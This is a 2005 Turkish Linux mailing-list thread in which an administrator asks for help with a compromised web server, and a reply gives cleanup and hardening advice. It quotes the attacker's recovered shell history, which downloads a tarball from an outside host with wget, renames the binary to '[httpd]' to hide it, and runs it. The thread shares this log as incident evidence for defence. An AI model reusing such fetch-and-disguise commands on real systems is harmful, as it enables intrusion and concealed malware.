From: Emre Erim (emreerim@ttnet.net.tr)
Date: Mon 18 Apr 2005 - 14:42:41 EEST
Merhaba sunucunuza rootkit yuklenmis.
www.rootkit.nl adresinden bulabileceginiz program ile duruma bakabilir hangi
rootkitler ile sisteminizin ele gecirildigini gorebilirsiniz.
temizlemek icin ilgili root kitin ne oldugunu bulduktan sonra google aramasi
yapabilirsiniz.
ancak sisteminizi ele geciren kisi ilgili bazi binary dosyalarinizi
degistirdi ise bence en guzel yapacaginiz sey sisteminizi en bastan 0 dan
kurmak/ kurdurtmak olacaktir. umarim yedekleriniz vardir..
sistem kurulduktan sonra
acil ve hizli bir sekilde tum guncel updateler yapilmali
saglam ve guvenilir bir firewall scripti ile guvenlik saglanmali mesela
KISS >> http://www.geocities.com/steve93138/
veya apf >> http://www.rfxnetworks.com/apf.php
/tmp dizini kesinlikle noexec olarak baglanmalidir.
ve hepsinden onemlisi websunucu oldugunu soylediginiz sistemin 1 daha ele
gecirlmesini onlemek icin sistemdeki calisan uygunsuz ve aciklari bulunan
uygulamalar derhal yok edilmelidir.
Buyuk ihtimalle benim karsilastigim rootkit olaylarinin %95 inde phpnuke
veya ona bagli gallery gibi bazi scriptlerin aciklarindan
faydalanilmaktadir. PhpMyadmin de dahi eski versyonlarinda cok ciddi bu tur
guvenlik aciklari bulunmaktadir.
Sisteminize netstat -an komutunu verdiginizde alakasiz portlari dinleyen
bazi uygulamalar gorebilirsiniz bunlar buyuk ihtimalle disaridan erisime
izin veren telnet sunuculari olacaktir. Bunlari derhal sonlandirmalisiniz ve
bu portlar uzerinden sunucunuza baglanmya calisan baglanan ip adreslerini
derhal bloklamalisiniz.
Bu tur uygulamalarin binary dosyalari genelde sistemde kendilerini guzelemk
icin baska isimler altinda calisirlar.Benim en cok karsilastigim kendilerine
sendmail veya httpd susu vermeye calisan uygulamalar olmustur. Bunlari
tespit etmek icin #ps -e yazabilir ve sisteminizde calismadigi ahlde listede
gozuken uygulamalari takip edebilirsiniz.
Bunun haricinde sistemde herhangi baska bir degisiklik olup olmadigini
anlamak icin standart guvenlik prosedurlerinizi kontrol etmenizi oneririm.
Ornegin /etc/passwd ve /etc/shadow dosyalarinizda uidi 0 olan root dan baska
kullaniclar varmi vs vs gibi.
Bu tur rootkit scriptleri genelde rasgele irc sunucularina baglanarak bnc
olarak veya dediginiz gibi ddos yapmak amaciyla kullanilmaktadir.
Eger guvenlik konusunda ciddi problemleriniz varsa ve websunucunuzu guvenli
hale getirmek icin yeterli bilginiz yoksa kesinlikle profesyonel yardim
almanizi oneririm.
Emre Erim
----- Original Message -----
From: "The RED" <jdred@gmx.net>
To: <linux-guvenlik@liste.linux.org.tr>
Sent: Monday, April 18, 2005 1:50 PM
Subject: [Linux-guvenlik] r0nin
/var/tmp dizininde .bash_history oluşmuş. Sunucudaki exploit bir shell
hesabı açıyor herhalde ve ev dizinini /var/tmp olarak veriyor. Normalde
hiçbir kullanıcının shell izni yok. (sunucu web sunucu)
/var/tmp/.bash_history dosyasının içeriği:
e
w
/sbin/ifconfig
w
cd /var/tmp/.hu
cd /var/tmp
mkdir .hu
cd .hu
wget powerlock.home.ro/newpas.tgz
wget powerlock.home.ro/newpass.tgz
tar zxvf newpass.tgz
mv newpass [httpd]
export PATH="."
[httpd]
----- Original Message -----
From: "The RED" <jdred@gmx.net>
To: <linux-sunucu@liste.linux.org.tr>
Sent: Monday, April 18, 2005 1:43 PM
Subject: Re: [Linux-sunucu] r0nin
> Birileri sürekli /tmp ve /var/tmp dizinlerine r0nin vs. gibi dosyalar
> yerleştirip çalıştırıyorlar. Az önce de "atac" isimli bri şey yüklenmiş ve
> biraz önce bri atak yapıldı. 200-300 tane çalıştırılmış. ddos atağı
> yapılıyor herhalde sunucu üzerinden. /var/tmp ve /tmp dizinlerindeki
> dosyaların çalıştırılmasını nasıl önleyebilirim bilen yok mu?? Isletim
> sistemi: Fedora core 1, kernel 2.4.22-1.2115.nptl,
>
> ----- Original Message -----
> From: "The RED" <jdred@gmx.net>
> To: <linux-sunucu@liste.linux.org.tr>
> Sent: Monday, April 18, 2005 11:48 AM
> Subject: [Linux-sunucu] r0nin
>
>
>> merhaba. sunucuma bir süredir r0nin dadandi. daha önce temizlemistim
>> yeniden
>> /tmp/ dizini altina girmis. Daha önce de bu dizin altinda r0nin, brk gibi
>> şeyler vardi silmistim ama bugün r0nin tekrar o dizinde.
>> Internetten biraz arastirdim ama yeterli bilgiye rastlayamadim henüz.
>> Nedir bu r0nin tam olarak? Apache ile ilgili bir açiktan bahsediliyor.
>> Nasil
>> bulasiyor? Etkileri (yol açabileceği şeyler) neler ve nasil tam olarak
>> silinebiliyor? Bilen varsa lütfen yardimci olun.
>>
>>
>
>
> --------------------------------------------------------------------------------
>
>
> _______________________________________________
> Linux-sunucu mailing list
> Linux-sunucu@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
>
>
--------------------------------------------------------------------------------
_______________________________________________
Linux-sunucu mailing list
Linux-sunucu@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
--------------------------------------------------------------------------------
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik